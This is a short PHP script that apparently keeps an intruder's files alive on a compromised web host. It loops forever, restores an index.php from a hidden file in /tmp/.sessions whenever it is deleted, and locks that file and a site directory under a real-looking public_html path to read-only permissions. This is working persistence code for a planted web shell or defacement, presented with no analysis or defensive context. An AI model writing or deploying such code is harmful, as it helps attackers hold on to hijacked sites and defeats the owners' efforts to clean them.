
<?php
@ini_set("max_execution_time", 0);
while (True){
    if (!file_exists("/home/r2745769/public_html/koube-bmw-kaitori.com")){
        mkdir("/home/r2745769/public_html/koube-bmw-kaitori.com");
    }
    if (!file_exists("/proc/13205/ns/index.php")){
        $text = base64_encode(file_get_contents("/tmp/.sessions/.L3Byb2MvMTMyMDUvbnNpbmRleC10ZXh0"));
        file_put_contents("/proc/13205/ns/index.php", base64_decode($text));
    }
    if (gecko_perm("/proc/13205/ns/index.php") != 0444){
        chmod("/proc/13205/ns/index.php", 0444);
    }
    if (gecko_perm("/home/r2745769/public_html/koube-bmw-kaitori.com") != 0555){
        chmod("/home/r2745769/public_html/koube-bmw-kaitori.com", 0555);
    }
}

function gecko_perm($flename){
    return substr(sprintf("%o", fileperms($flename)), -4);
}
